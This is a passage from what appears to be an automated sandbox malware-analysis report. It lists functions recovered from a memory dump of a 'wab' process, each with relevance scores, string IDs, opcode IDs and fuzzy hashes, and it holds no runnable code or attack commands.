                                                            • Instruction ID: ecf0c9352cd1a8f723e0ff180ca46536ea48e4157556a2bdcd445e79e2288ab8
                                                            • Opcode Fuzzy Hash: cb62cbb01298ea91b0ddf79b0f302853e24cc74d4255cf3e760a261b18d21446
                                                            • Instruction Fuzzy Hash: 834138B5D0062CABEF21DB50CD94FDEB77CAB45754F0045EAEA08AB140DB709E498F98
                                                            Function 036A97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: verifier.dll
                                                            • API String ID: 0-3265496382
                                                            • Opcode ID: c64b013f6389e0a68fbc741260731eaa97e2366e3811306aef904aee24e74a14
                                                            • Instruction ID: 4a476291e62ea3db8a76cdd2e60c927703c3ce35d6a75d8ccb909cbe371566a5
                                                            • Opcode Fuzzy Hash: c64b013f6389e0a68fbc741260731eaa97e2366e3811306aef904aee24e74a14
                                                            • Instruction Fuzzy Hash: AB31C5B67007059FDB24DF2D9950B26B7E5EB89710F68887AE605DF381E7358C81CB90
                                                            Function 036C705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: kLsE
                                                            • API String ID: 0-3058123920
                                                            • Opcode ID: 1035a0e1f1c44e11809df63090580641358c41cca516684c7deb290d04b18b3f
                                                            • Instruction ID: 2c589f766bd101a69683c37e8a69bfd4c29ebb7ed2e7e5a2c56ce01eca2988b3
                                                            • Opcode Fuzzy Hash: 1035a0e1f1c44e11809df63090580641358c41cca516684c7deb290d04b18b3f
                                                            • Instruction Fuzzy Hash: 914169B35213904FE720FB68E989B757FA4EB40724F19812DECA09F1C9C7B84485CBA5
                                                            Function 036536EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Flst
                                                            • API String ID: 0-2374792617
                                                            • Opcode ID: 5e0832707b7669606922778da03dd040337e04077505767af99641da04ac947e
                                                            • Instruction ID: dfe0457bbe6966073702ab0825c9ba546b673f96573258fdf027494453c39711
                                                            • Opcode Fuzzy Hash: 5e0832707b7669606922778da03dd040337e04077505767af99641da04ac947e
                                                            • Instruction Fuzzy Hash: 6C41CAB9A053019FD714CF28C184B16FBE8EB49B54F28856EE849CF341DB31D942CB99
                                                            Function 03619730 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: L4rwL4rw
                                                            • API String ID: 0-1810648253
                                                            • Opcode ID: 84e062c791c77356a14dd741646b46f9e6a50fb025ecff82dd03cdc388f2b3e7
                                                            • Instruction ID: fe3606e54b3dc6503ba6005656951bbe9ada5cb1ae416ffc07f31ee951238cc0
                                                            • Opcode Fuzzy Hash: 84e062c791c77356a14dd741646b46f9e6a50fb025ecff82dd03cdc388f2b3e7
                                                            • Instruction Fuzzy Hash: FF21BA7AA00714ABD322DF198814B5ABBF4EF85B60F1A4829AA559B341DB70E811CBD0
                                                            Function 03625096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Actx
                                                            • API String ID: 0-89312691
                                                            • Opcode ID: 0462e85b3044391b46d128f685744f7900172f7bf9a52a6771bd5fa7b12db845
                                                            • Instruction ID: 2cb4ec3af37f34761417659494de4b75d7f6b49a2d4a9be5bdf159eeb16c4e18
                                                            • Opcode Fuzzy Hash: 0462e85b3044391b46d128f685744f7900172f7bf9a52a6771bd5fa7b12db845
                                                            • Instruction Fuzzy Hash: F3118430305D229BD738C91D8D54676FE95EB87214F3A452ADA53CB390D671D8428B80
                                                            Function 036A106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrCreateEnclave
                                                            • API String ID: 0-3262589265
                                                            • Opcode ID: fd4954b097a8017f43ed973fc03fe6b12646b16eb46d5481abe1f83996ddb773
                                                            • Instruction ID: 236aa22ed83f61e7c311559ab0090a428384ae776dfe2373018a1be0eeece822
                                                            • Opcode Fuzzy Hash: fd4954b097a8017f43ed973fc03fe6b12646b16eb46d5481abe1f83996ddb773
                                                            • Instruction Fuzzy Hash: AC2104B65087449FC310DF1AC845A5BFBE8EBD6B40F004A1EB9A09B350DBB0D905CF96
                                                            Function 0367739A Relevance: .7, Instructions: 705COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6893eec3f05e2bd5d0f385b995999cbf44cd00f3eb3e3ad978cc79933e6fd6a0
                                                            • Instruction ID: 1d00ce0c2dd605c1a1b7762c90d7749e8794819fd79025aeab55f410cb40cdb2
                                                            • Opcode Fuzzy Hash: 6893eec3f05e2bd5d0f385b995999cbf44cd00f3eb3e3ad978cc79933e6fd6a0
                                                            • Instruction Fuzzy Hash: BB42C275A006168FDB18CF59C590ABEF7F6FF88314B68856DD452AB344DB34E842CBA0
                                                            Function 0364B2C0 Relevance: .6, Instructions: 629COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd0aca91535a3de2fb6ec22fa6ab767d5fa8c979a2c51b9d0ce6025d53e3befb
                                                            • Instruction ID: 7ff0867313c048b447ff8172ad41a7467c4b98128b3e7f2f49c7dfd3351b4084
                                                            • Opcode Fuzzy Hash: fd0aca91535a3de2fb6ec22fa6ab767d5fa8c979a2c51b9d0ce6025d53e3befb
                                                            • Instruction Fuzzy Hash: 1232BD76E01219DBCF24DFA8D990BAEBBB5FF48714F18012DE845AB381E7359911CB90
                                                            Function 036B8158 Relevance: .6, Instructions: 617COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dc81f7e2bd094e0d6b681d490f5695893300be400fa568f5d9d8fe042d8c732a
                                                            • Instruction ID: 6286079664921a59d9d4520a875bd7a263e56da493742f41b6c03f1e5aa21fc6
                                                            • Opcode Fuzzy Hash: dc81f7e2bd094e0d6b681d490f5695893300be400fa568f5d9d8fe042d8c732a
                                                            • Instruction Fuzzy Hash: 75424B75E002598FDB24CF69C981BEDF7F9BF49300F188199E989AB242D7349985CF60
                                                            Function 036E16CC Relevance: .6, Instructions: 571COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 18634d41c54a144cd444209a3dc7948f3fb16c4db22ea0fb017bf3db72533521
                                                            • Instruction ID: f0e7fe6dee8acc3d04957ed7daf4dd79364b794867722a592834503b88f2756e
                                                            • Opcode Fuzzy Hash: 18634d41c54a144cd444209a3dc7948f3fb16c4db22ea0fb017bf3db72533521
                                                            • Instruction Fuzzy Hash: 8022C235A012168FCB19CF58C590ABEF7B6FF8A304B28456DD856DB340DB34E946DB90
                                                            Function 03618397 Relevance: .4, Instructions: 380COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7056fe054b75256a556789b0a6cb26b96d84b451a62eb5cfd92480cdd437ec8d
                                                            • Instruction ID: 73a765d3cfea34d78e73dd50a08ce4a4794cb43611b41bdf496fc801547b9bac
                                                            • Opcode Fuzzy Hash: 7056fe054b75256a556789b0a6cb26b96d84b451a62eb5cfd92480cdd437ec8d
                                                            • Instruction Fuzzy Hash: 34D1D376A007169BDF24DF68C990ABEB7A5FF44314F0C462DE916DB280EB34D961CB60
                                                            Function 0362D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 23990944a1e3d0d51698403bcc0885c3e0e901f4c284884e671eeca3e5dda637
                                                            • Instruction ID: d80ddecd9a90af47908ccff53240c60bd92cac3995d0d149742906d576121cf4
                                                            • Opcode Fuzzy Hash: 23990944a1e3d0d51698403bcc0885c3e0e901f4c284884e671eeca3e5dda637
                                                            • Instruction Fuzzy Hash: B5C1D671E006169FDB25DF5AC940BBEFBB5EF48310F198269D865AB380DB74E941CB80
                                                            Function 036490DB Relevance: .3, Instructions: 287COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b10b40c4393744a4b709c0608359e88411d15b8a33e291d42c2531992c0b7b23
                                                            • Instruction ID: 25b5f3d7bfdfc36bbe813c929d90bcb957dc201ac162a5ea6407a91a50960c14
                                                            • Opcode Fuzzy Hash: b10b40c4393744a4b709c0608359e88411d15b8a33e291d42c2531992c0b7b23
                                                            • Instruction Fuzzy Hash: 65A13975940215AFEB12EF64CC91FAF7BB9AF4A750F050158FA00AF2A0D7759C50CBA8
                                                            Function 036283C0 Relevance: .3, Instructions: 281COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c70c70326c7a5bc2a8aa5f0089796fa7bf679f383a46852f5bc1a553a72eee33
                                                            • Instruction ID: c31b92e23a1810647c16c66f277aafc87e08d3cea66985a80c535cc0bdb52379
                                                            • Opcode Fuzzy Hash: c70c70326c7a5bc2a8aa5f0089796fa7bf679f383a46852f5bc1a553a72eee33
                                                            • Instruction Fuzzy Hash: 85C167741083408FD764DF18C994BABBBE4BF88304F49496DE9899B390D7B4E909CF92
                                                            Function 03660185 Relevance: .3, Instructions: 276COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 443d90282c8a10204976ac236c6d2daecda6da17394f1f38a3b860dfe121c6cb
                                                            • Instruction ID: 6a251a145860f92ce44f0d3df7c5d16b0bed4627260ecc39120e12f03a9c5734
                                                            • Opcode Fuzzy Hash: 443d90282c8a10204976ac236c6d2daecda6da17394f1f38a3b860dfe121c6cb
                                                            • Instruction Fuzzy Hash: EFA1C271A05716DBEB24DF65C6907AAB7B9FF44354F04407EEA059B381EB34E812C790
                                                            Function 036A60E0 Relevance: .3, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3b604e018eb650f71ca33ea03141143c68589c49130db293f5a1e3c20f12a911
                                                            • Instruction ID: da6f4703a6fc4e6ad6b6259ad418e7c89bac0bff49777773f9348a9bc65d67de
                                                            • Opcode Fuzzy Hash: 3b604e018eb650f71ca33ea03141143c68589c49130db293f5a1e3c20f12a911
                                                            • Instruction Fuzzy Hash: 0091BE75E00615AFDB15CFACD894BAEBFB5AF49700F194169E610AB340D738ED018FA4
                                                            Function 0363E3F0 Relevance: .3, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b9189202d430a037f230ce472d06a478d6c0fcda1b8f54c807dc3510cea4e6b9
                                                            • Instruction ID: ae698518ea648ee83b109b3edf3f60a430e09dfb00ae48b9e89a57513204dcc5
                                                            • Opcode Fuzzy Hash: b9189202d430a037f230ce472d06a478d6c0fcda1b8f54c807dc3510cea4e6b9
                                                            • Instruction Fuzzy Hash: 6E914577A006159BDB24EB58C540BBEB7F1EF8A724F084569EC059B381E736D902CB70
                                                            Function 03621131 Relevance: .3, Instructions: 259COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4e29ee4812654026ec996684631c6128a2178d9621f51ac7e2a68d4282b23b3b
                                                            • Instruction ID: 5d216f4717c8afc6f4abd1423641a55f942b447c67d51c1d88fb495c266999d2
                                                            • Opcode Fuzzy Hash: 4e29ee4812654026ec996684631c6128a2178d9621f51ac7e2a68d4282b23b3b
                                                            • Instruction Fuzzy Hash: 80B111756097408FD354CF28C580A6AFBE1BF89304F584A6EF899CB352D331E985CB96
                                                            Function 0364D090 Relevance: .2, Instructions: 217COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                            • Instruction ID: c316d30fd572f472ec3205b07872d89c2f10692148578ed378a9cba06b9f6f0e
                                                            • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                            • Instruction Fuzzy Hash: D5819D76E001198BDF14EF58C9807AEFBB2FF88308F19826ADC15BB345D6329945CB91
                                                            Function 0365E284 Relevance: .2, Instructions: 212COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2fa57529d205fad66c0462594aed0c123504bf45b6c911a067d1f98a4311ddb2
                                                            • Instruction ID: a7108b3f7e599b6884c16e7b5eda05e228280d3f47fd11b8cd3068c3d788f463
                                                            • Opcode Fuzzy Hash: 2fa57529d205fad66c0462594aed0c123504bf45b6c911a067d1f98a4311ddb2
                                                            • Instruction Fuzzy Hash: 50817C75A00609AFDF25CFA9C980AEEBBFAFF48340F14442DE955A7210D731AD05CB60
                                                            Function 0363C640 Relevance: .2, Instructions: 206COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 506f5a166223d27181b5615313bcae21479166e298826c13509ff8aa5f60f6b2
                                                            • Instruction ID: db19eebee2cdc07d1baef11f4798fb200850cc81ec4298839e8e138380038374
                                                            • Opcode Fuzzy Hash: 506f5a166223d27181b5615313bcae21479166e298826c13509ff8aa5f60f6b2
                                                            • Instruction Fuzzy Hash: D571BDB6D04669DBCB25DF58C9907BEFBB5FF49704F18825AE842AB350D7349801CBA0
                                                            Function 0363260B Relevance: .2, Instructions: 201COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ae4e1a9fc13c3fa8c33ca93b4514e15bbd84d395490ebd8a02042520abfa8a28
                                                            • Instruction ID: 768bfe0c2d74d8f9b0306a1e96faf0974f8edd5f43ede8cce1d2e213af679a2e
                                                            • Opcode Fuzzy Hash: ae4e1a9fc13c3fa8c33ca93b4514e15bbd84d395490ebd8a02042520abfa8a28
                                                            • Instruction Fuzzy Hash: 10711235A04241DFC311DF28C594B2AB7F5FF8A700F0889AAE899CB351DB38D846CB95
                                                            Function 036A035C Relevance: .2, Instructions: 198COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                            • Instruction ID: 56545e7338e75f788b7e9d07e9cffb148bec35d1693635e42b52243d32c6958a
                                                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                            • Instruction Fuzzy Hash: BD715B75A00619AFCB10DFA9CA84AAEBBB9FF49700F144569E505EB250DB34EE01CF94
                                                            Function 036B62A0 Relevance: .2, Instructions: 198COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f2cc0ba906b6428cb66c39ea3b02d6b2c5bc2cbb7fd8bc90faf07a04937499f
                                                            • Instruction ID: 2a1ca56f073f1f8ac8107d65a2482a14d619dee6e1122f22b84ec600a759a4aa
                                                            • Opcode Fuzzy Hash: 4f2cc0ba906b6428cb66c39ea3b02d6b2c5bc2cbb7fd8bc90faf07a04937499f
                                                            • Instruction Fuzzy Hash: 7E71FF36240B01AFDB21DF18C954FAAB7F5EF44764F18882CE2568B2A0D775E984CF64
                                                            Function 036E132D Relevance: .2, Instructions: 188COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bba3a7de09687be4374f55d1e86bbaad113d0c532afc52bc06e33c0ffa8d26cc
                                                            • Instruction ID: 619869fdc7d4db746f3a8e1c73eaea39473eaae7227c83b56a69c9a9292d7181
                                                            • Opcode Fuzzy Hash: bba3a7de09687be4374f55d1e86bbaad113d0c532afc52bc06e33c0ffa8d26cc
                                                            • Instruction Fuzzy Hash: DA817D75A01205DFCB09CFA8C590AAEBBF1FF49300F1981A9D859EB345D734EA45CBA0
                                                            Function 036E903E Relevance: .2, Instructions: 186COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2962a157f53d8c104441f05ccce64bce8263abc06642b3719d46af6034feaead
                                                            • Instruction ID: e05516a138057bb012fd3dbb4a98199ac365a96e798b0f29942dc0126cd79c4f
                                                            • Opcode Fuzzy Hash: 2962a157f53d8c104441f05ccce64bce8263abc06642b3719d46af6034feaead
                                                            • Instruction Fuzzy Hash: 3061DDB5602715AFC715DF68C884BABBBE8FF88300F04461DF8698B340DB34A919CB95
                                                            Function 03627703 Relevance: .2, Instructions: 179COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: baf453b58ae72049e900a1e67f13f83f402a502c99655e950c673db7325f912b
                                                            • Instruction ID: 64bd9c2ae7697a2242b2f41d3f31fb82d97bff649f959cb818f647048ae52521
                                                            • Opcode Fuzzy Hash: baf453b58ae72049e900a1e67f13f83f402a502c99655e950c673db7325f912b
                                                            • Instruction Fuzzy Hash: A3617575A00A159FDB18DF78C590AADFBB5FF89200F15816ED419A7301DB34A942CFD4
                                                            Function 036E92A6 Relevance: .2, Instructions: 174COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 160e82bf148875a1367c578a24c4d92175dfc36df4f216782adcfa1ec3c8b3fe
                                                            • Instruction ID: 56e56665577c230785910fbef419fcc4503474df6009c425c2e9e40fb9c1af97
                                                            • Opcode Fuzzy Hash: 160e82bf148875a1367c578a24c4d92175dfc36df4f216782adcfa1ec3c8b3fe
                                                            • Instruction Fuzzy Hash: 4161F47620A742CFD711CF68C594B6AF7E0BF80704F18446CE8958B391EB79E80ACB95
                                                            Function 0361B2D3 Relevance: .2, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2d9bd1d1bd4a8e3ab642e43e1db4035142ffbbdf20fcb119fe91e3a4fe47731b
                                                            • Instruction ID: f5d0519fcf13ae19a963bdd3eb4eccadb9813af971ace23418b64f9e490c09d0
                                                            • Opcode Fuzzy Hash: 2d9bd1d1bd4a8e3ab642e43e1db4035142ffbbdf20fcb119fe91e3a4fe47731b
                                                            • Instruction Fuzzy Hash: 7F413536600700AFDB25DF29DA90B26BBA8EF45760F19847DF9099F350DB74D821CBA4
                                                            Function 03633740 Relevance: .2, Instructions: 159COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ca82783656b5d9cf222684aa42310b05f4cfb5c94155a5404999aa06b44fc582
                                                            • Instruction ID: a5a4af78f10f06ad55b0fc96b28535ecdafafff7828c5b1e90ee7a8d8956f2ab
                                                            • Opcode Fuzzy Hash: ca82783656b5d9cf222684aa42310b05f4cfb5c94155a5404999aa06b44fc582
                                                            • Instruction Fuzzy Hash: 7351F079E00656AFC721CF68C4846A9B7B4FF06710F2886A9E845DF340E734E996CBD4
                                                            Function 03627152 Relevance: .2, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f1fd40026e03786e4a611f2e24b242eb8b5128412467ae87de9bc3f4dd75b4ec
                                                            • Instruction ID: 4e897e7b0c46d8d06c02b3ec4e797ead3dfee4f4f54f336cfae3efaf450b97ae
                                                            • Opcode Fuzzy Hash: f1fd40026e03786e4a611f2e24b242eb8b5128412467ae87de9bc3f4dd75b4ec
                                                            • Instruction Fuzzy Hash: B5510135A00A19EFEB05EB64CA48BADBFB4FF09315F19416DE50297390EB749902CF80
                                                            Function 036ED26B Relevance: .2, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                            • Instruction ID: 7b11ebc6eae141617f90babb415bb55df3f171462448cf9d6c2dba28f6932aaf
